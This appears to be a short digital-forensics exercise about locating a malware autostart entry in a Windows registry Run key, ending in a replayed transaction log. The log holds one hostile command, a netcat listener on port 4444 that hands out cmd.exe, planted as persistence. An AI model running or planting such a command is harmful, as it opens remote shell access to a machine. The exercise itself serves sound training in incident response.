Mission: Locate the persistence mechanism (malware autostart).
Currently viewing the primary hive file. Navigate to Software\Microsoft\Windows\CurrentVersion\Run.
| Name | Type | Data |
|---|---|---|
| OneDrive | REG_SZ | "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background |
| SecurityHealth | REG_EXPAND_SZ | %windir%\system32\SecurityHealthSystray.exe |
Transaction Log Viewer
Format: ASCII DumpType: REG_SZ
Data: "C:\Temp\nc.exe -L -p 4444 -e cmd.exe"
Replaying Transaction Logs...
Merging SEQ 1043 into Primary Hive